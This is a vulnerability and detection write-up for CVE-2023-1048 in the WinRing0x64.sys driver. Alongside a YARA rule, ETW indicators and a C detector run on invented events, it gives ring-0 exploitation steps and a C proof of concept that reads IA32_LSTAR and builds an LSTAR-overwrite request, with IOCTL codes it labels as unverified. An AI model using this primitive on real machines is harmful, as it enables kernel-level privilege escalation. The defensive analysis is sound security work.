CVE-2023-1048
WinRing0x64 — arbitrary MSR write and physical memory R/W via IOCTL
Summary
| Field | Value |
|---|---|
| Driver | WinRing0x64.sys |
| Vendor | OpenLibSys / bundled by TechPowerUp, CPUID, Razer, LibreHardwareMonitor, and dozens of others |
| Vulnerability Class | Arbitrary R/W / MSR Write / Physical Memory Mapping |
| Abused Version | 1.2.0.5 and earlier (all known versions) |
| Status | Blocklisted — Microsoft classifies as VulnerableDriver:WinNT/Winring0 (variants A–G) |
| Exploited ITW | Yes |
BYOVD Context
- Driver signing: Authenticode-signed; multiple signed variants exist from different bundling vendors (CPUID, Razer, Noriyuki Miyazaki)
- Vulnerable Driver Blocklist: Included. Microsoft classifies multiple hash variants as VulnerableDriver:WinNT/Winring0.A through .G
- HVCI behavior: Blocked on HVCI-enabled systems via the blocklist
- KDU integration: Not directly integrated, but the WinRing0 library is used by many open-source hardware tools
- LOLDrivers: Listed at loldrivers.io with multiple hash variants
Affected IOCTLs
- Arbitrary MSR write (WRMSR) with user-controlled register index and value
- Arbitrary MSR read (RDMSR)
- Physical memory read via MmMapIoSpace
- Physical memory write via MmMapIoSpace
- I/O port read/write (IN/OUT)
- PCI configuration space access
Root Cause
WinRing0x64.sys is an open-source kernel driver from the OpenLibSys project, designed to provide user-mode applications with direct access to hardware registers, physical memory, MSRs, I/O ports, and PCI configuration space. It is bundled by a vast number of hardware monitoring and tuning applications — TechPowerUp RealTemp, CPUID HWMonitor, Razer Synapse 3, LibreHardwareMonitor, FanControl, and many others.
The driver creates its device object without a restrictive security descriptor, so any local user can open it, and it exposes IOCTLs for all of the above hardware access primitives without any caller validation. Every IOCTL accepts user-controlled parameters (physical address, MSR index, port number) and performs the operation directly. This is by design: the driver exists to give hardware tools full access. But the complete absence of access control means any process on the system gets the same ring-0 reach as the monitoring tool that shipped it.
CVE-2023-1048 specifically documents the vulnerability as present in TechPowerUp Ryzen DRAM Calculator v1.7.3 (WinRing0x64.sys v1.2.0.5), but the same driver binary is bundled with dozens of applications. CVE-2023-1047 covers the same driver bundled with TechPowerUp RealTemp.
The widespread distribution of WinRing0 makes it one of the most commonly encountered BYOVD drivers. In early 2025, Windows Defender began flagging WinRing0 in consumer tools like Razer Synapse and FanControl, prompting vendors to update or remove the driver.
Exploitation
The MSR write IOCTL is the most dangerous primitive. The standard exploitation via MSR:
- Load WinRing0x64.sys (or find it already present from a hardware monitoring tool)
- Open a handle to the device
- Use the WRMSR IOCTL to write IA32_LSTAR (MSR 0xC0000082), which holds the kernel syscall entry point address
- Redirect syscall dispatch to attacker-controlled code
- Execute arbitrary code in ring 0 on the next syscall
Note that on current CPUs SMEP prevents jumping from LSTAR straight to user-mode shellcode, so the redirected entry must land in kernel-executable memory (a gadget or ROP chain in ntoskrnl), which is one reason many chains prefer the physical memory primitive below.
Alternatively, the physical memory R/W IOCTLs allow the standard page-table-walk approach:
- Map physical memory pages via the MmMapIoSpace IOCTL
- Walk the page table hierarchy to locate kernel structures
- Overwrite EPROCESS tokens for SYSTEM privilege escalation
The zeze-zeze/WindowsKernelVuln repository provides PoC code demonstrating both MSR-based kernel execution and physical memory access.
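The MSR primitive described above, as an added example written for this page (it is not OpenLibSys code and not the PoC from the repository just cited). The control codes and the request layout follow OlsIoctl.h as I recall it (OLS_TYPE 40000, functions 0x821 READ_MSR and 0x822 WRITE_MSR, METHOD_BUFFERED, FILE_ANY_ACCESS) and the device link name \\.\WinRing0_1_2_0 is assumed for the v1.2.x driver; verify both against the header before relying on them. On Windows, main() opens the device and reads IA32_LSTAR, which leaks the KASLR-randomized syscall handler address to an unprivileged process; the write request that hijacks dispatch is built but never sent, because sending it with a bogus value bug-checks the machine.

```c
/*
 * Added example (not from the page, not OpenLibSys code): what a
 * user-mode client sends to the WinRing0 MSR IOCTLs.  Control codes,
 * input layout and device name are assumptions recalled from
 * OlsIoctl.h; check them against the header.
 */
#include <stdint.h>
#include <stdio.h>

#ifdef _WIN32
#include <windows.h>
#endif

/* WDK CTL_CODE(): DeviceType << 16 | Access << 14 | Function << 2 | Method */
#define OLS_TYPE 40000u
uint32_t ols_ctl_code(uint32_t function)
{
    const uint32_t method_buffered = 0, file_any_access = 0;
    return (OLS_TYPE << 16) | (file_any_access << 14) | (function << 2) | method_buffered;
}
#define IOCTL_OLS_READ_MSR  ols_ctl_code(0x821)   /* assumed: 0x9C402084 */
#define IOCTL_OLS_WRITE_MSR ols_ctl_code(0x822)   /* assumed: 0x9C402088 */

#define IA32_LSTAR 0xC0000082u   /* x64 syscall entry point (KiSystemCall64) */

/* Assumed mirror of OLS_WRITE_MSR_INPUT.  Copy the real definition from
   OlsIoctl.h so field offsets match the driver's build. */
struct ols_write_msr_input {
    uint32_t Register;
    uint64_t Value;
};

/* The entire primitive: a register number and a 64-bit value that the
   driver hands to __writemsr() without checking which MSR is named. */
struct ols_write_msr_input build_wrmsr_request(uint32_t msr, uint64_t value)
{
    struct ols_write_msr_input req = { msr, value };
    return req;
}

#ifdef _WIN32
/* Opens the driver's symbolic link (assumed name for v1.2.x) and reads
   one MSR.  No privilege is required to open the device. */
int read_msr_via_driver(uint32_t msr, uint64_t *value)
{
    HANDLE h = CreateFileA("\\\\.\\WinRing0_1_2_0", GENERIC_READ | GENERIC_WRITE,
                           0, NULL, OPEN_EXISTING, 0, NULL);
    if (h == INVALID_HANDLE_VALUE)
        return 0;
    DWORD ret = 0;
    BOOL ok = DeviceIoControl(h, IOCTL_OLS_READ_MSR, &msr, sizeof msr,
                              value, sizeof *value, &ret, NULL);
    CloseHandle(h);
    return ok && ret == sizeof *value;
}
#endif

int main(void)
{
    /* Build, but never send, the write that hijacks syscall dispatch.
       A real chain points Value at a kernel gadget; a bogus value
       bug-checks the machine on the next syscall. */
    struct ols_write_msr_input req = build_wrmsr_request(IA32_LSTAR, 0x4141414141414141ull);
    printf("IOCTL 0x%08X: WRMSR 0x%08X <- 0x%016llX (%zu-byte request)\n",
           (unsigned)IOCTL_OLS_WRITE_MSR, (unsigned)req.Register,
           (unsigned long long)req.Value, sizeof req);

#ifdef _WIN32
    uint64_t lstar = 0;
    if (read_msr_via_driver(IA32_LSTAR, &lstar))
        printf("IA32_LSTAR = 0x%016llX (syscall handler address, read by an unprivileged process)\n",
               (unsigned long long)lstar);
    else
        printf("WinRing0 device not present; nothing read.\n");
#endif
    return 0;
}
```

The read alone is already a KASLR bypass: IA32_LSTAR points into ntoskrnl, so subtracting the known offset of the syscall handler gives the kernel base without any other leak. The same DeviceIoControl call with IOCTL_OLS_WRITE_MSR and the struct from build_wrmsr_request is the ring-0 write the page describes.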
Detection
YARA Rule
rule CVE_2023_1048_WinRing0x64 {
    meta:
        description = "Detects WinRing0x64.sys vulnerable driver"
        cve = "CVE-2023-1048"
        author = "KernelSight"
        severity = "critical"
    strings:
        $mz = { 4D 5A }
        $driver_name = "WinRing0" wide ascii nocase
        $openlib = "OpenLibSys" wide ascii
        // Device name is \Device\WinRing0_1_2_0 in v1.2.x; the prefix matches all versions.
        $device = "\\Device\\WinRing0" wide ascii
    condition:
        // Broad by design: this also hits the WinRing0 user-mode DLL and any
        // application that embeds the driver. Scope scans to .sys files, or pair
        // with the blocklist hashes, before treating a hit as an alert.
        $mz at 0 and ($driver_name or $openlib or $device)
}
ETW Indicators
| Provider | Event / Signal | Relevance |
|---|---|---|
| Microsoft-Windows-Kernel-File | File create/write of WinRing0x64.sys | Driver dropped to a temporary or user-writable path before its service is registered |
| Sysmon | Event ID 6 — Driver loaded | Hash and signature capture; Windows Defender also flags as VulnerableDriver:WinNT/Winring0 |
| Microsoft-Windows-Security-Auditing | Event 4697 — Service installed | Service creation for WinRing0 driver |
| Microsoft-Windows-Kernel-Process | Process start events | Post-exploitation: a SYSTEM-integrity child spawned by the process that held the WinRing0 handle (there is no ETW event for the token swap itself) |
Behavioral Indicators
- Loading of WinRing0x64.sys from a temporary directory or user-writable path (not from a known hardware tool installation)
- WRMSR IOCTLs targeting IA32_LSTAR (0xC0000082) or other security-critical MSRs (IA32_STAR, IA32_CSTAR, IA32_SYSENTER_EIP, IA32_EFER) from non-hardware-monitoring processes
- Bursts of physical memory read/write IOCTLs from unknown processes; a page-table walk issues far more mappings than a temperature monitor ever does
- Windows Defender alert for VulnerableDriver:WinNT/Winring0 variants
- Privilege escalation following WinRing0 driver interaction from a process that is not a known hardware utility
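The behavioral indicators above as detection logic, added here as an example and not taken from the page or from any product. It runs over constructed event records whose shape (image path, device name, control code, input bytes) assumes a sensor that sees DeviceIoControl calls, such as a hook or ETW trace of your own; Sysmon Event 6 and Security 4697 supply only the load-path half. Control codes follow OlsIoctl.h as I recall it (OLS_TYPE 40000, READ_MSR 0x821, WRITE_MSR 0x822, WRITE_MEMORY 0x842, METHOD_BUFFERED, FILE_ANY_ACCESS) and should be verified against the header; the sample events are invented.

```c
/*
 * Added example, not from the original page: classify WinRing0 IOCTL
 * events against the behavioral indicators.  Control codes are recalled
 * from OlsIoctl.h (assumption); sample events are constructed.
 */
#include <ctype.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define OLS_IOCTL(fn)          ((40000u << 16) | ((fn) << 2))   /* METHOD_BUFFERED, FILE_ANY_ACCESS */
#define IOCTL_OLS_READ_MSR     OLS_IOCTL(0x821)
#define IOCTL_OLS_WRITE_MSR    OLS_IOCTL(0x822)
#define IOCTL_OLS_WRITE_MEMORY OLS_IOCTL(0x842)

struct ioctl_event {
    const char    *image;   /* process image path */
    const char    *device;  /* device object the handle refers to */
    uint32_t       code;    /* control code passed to DeviceIoControl */
    const uint8_t *in;      /* input buffer */
    size_t         in_len;
};

enum { F_UNTRUSTED_PATH = 1, F_CRITICAL_MSR_WRITE = 2, F_PHYSMEM_WRITE = 4 };

/* Writing any of these redirects or weakens kernel entry; no thermal or
   fan tool has a reason to touch them. */
static int is_security_critical_msr(uint32_t msr)
{
    switch (msr) {
    case 0x174: case 0x175: case 0x176:          /* IA32_SYSENTER_CS/ESP/EIP */
    case 0xC0000080:                              /* IA32_EFER */
    case 0xC0000081: case 0xC0000082:             /* IA32_STAR, IA32_LSTAR */
    case 0xC0000083: case 0xC0000084:             /* IA32_CSTAR, IA32_FMASK */
        return 1;
    default:
        return 0;
    }
}

static int ci_contains(const char *hay, const char *needle)
{
    size_t n = strlen(needle);
    for (; *hay; hay++) {
        size_t i = 0;
        while (i < n && hay[i] &&
               tolower((unsigned char)hay[i]) == tolower((unsigned char)needle[i]))
            i++;
        if (i == n)
            return 1;
    }
    return 0;
}

/* Directories a hardware tool's installer would not put its client in.
   Portable tools run from user folders are a known false-positive
   source; allowlist those by signer or hash rather than widening this. */
static int from_untrusted_path(const char *image)
{
    static const char *const dirs[] = { "\\temp\\", "\\appdata\\", "\\downloads\\", "\\users\\public\\" };
    for (size_t i = 0; i < sizeof dirs / sizeof dirs[0]; i++)
        if (ci_contains(image, dirs[i]))
            return 1;
    return 0;
}

static uint32_t le32(const uint8_t *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Bitmask of indicators the event trips; 0 means nothing to report. */
int classify_winring0_event(const struct ioctl_event *e)
{
    int flags = 0;
    if (!ci_contains(e->device, "winring0"))
        return 0;                                   /* some other driver */
    if (from_untrusted_path(e->image))
        flags |= F_UNTRUSTED_PATH;
    if (e->code == IOCTL_OLS_WRITE_MSR && e->in_len >= 4 && is_security_critical_msr(le32(e->in)))
        flags |= F_CRITICAL_MSR_WRITE;              /* first 4 bytes of a WRMSR request name the MSR */
    if (e->code == IOCTL_OLS_WRITE_MEMORY)
        flags |= F_PHYSMEM_WRITE;
    return flags;
}

/* Constructed sample events; none were captured from a real system. */
static const uint8_t therm_req[4]  = { 0x9C, 0x01, 0x00, 0x00 };                      /* RDMSR IA32_THERM_STATUS */
static const uint8_t lstar_req[12] = { 0x82, 0x00, 0x00, 0xC0, 0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41 };
static const uint8_t volt_req[12]  = { 0x50, 0x01, 0x00, 0x00, 0,0,0,0,0,0,0,0 };     /* WRMSR 0x150 */
static const uint8_t phys_req[16]  = { 0 };
#define NSAMPLES 5
const struct ioctl_event SAMPLES[NSAMPLES] = {
    { "C:\\Program Files\\CPUID\\HWMonitor\\HWMonitor.exe", "\\Device\\WinRing0_1_2_0", IOCTL_OLS_READ_MSR,     therm_req, sizeof therm_req },
    { "C:\\Users\\bob\\AppData\\Local\\Temp\\upd.exe",        "\\Device\\WinRing0_1_2_0", IOCTL_OLS_WRITE_MSR,    lstar_req, sizeof lstar_req },
    { "C:\\Program Files\\SomeTuner\\tuner.exe",              "\\Device\\WinRing0_1_2_0", IOCTL_OLS_WRITE_MSR,    volt_req,  sizeof volt_req  },
    { "C:\\Users\\bob\\Downloads\\x.exe",                     "\\Device\\WinRing0_1_2_0", IOCTL_OLS_WRITE_MEMORY, phys_req,  sizeof phys_req  },
    { "C:\\Users\\bob\\Downloads\\x.exe",                     "\\Device\\Null",           IOCTL_OLS_WRITE_MSR,    lstar_req, sizeof lstar_req },
};

int main(void)
{
    for (int i = 0; i < NSAMPLES; i++) {
        int f = classify_winring0_event(&SAMPLES[i]);
        printf("%-52s ioctl=0x%08X -> %s%s%s%s\n", SAMPLES[i].image, (unsigned)SAMPLES[i].code,
               f ? "" : "benign",
               f & F_UNTRUSTED_PATH ? "[untrusted-path]" : "",
               f & F_CRITICAL_MSR_WRITE ? "[critical-msr-write]" : "",
               f & F_PHYSMEM_WRITE ? "[physmem-write]" : "");
    }
    return 0;
}
```

The MSR check is the high-confidence signal: an MSR write to 0x150 from an installed tuning tool is normal, a write to IA32_LSTAR from anything is not. The path check on its own is only a prior, and the physical-memory flag fires for every WRITE_MEMORY call, so rate it by volume per process rather than alerting on the first one.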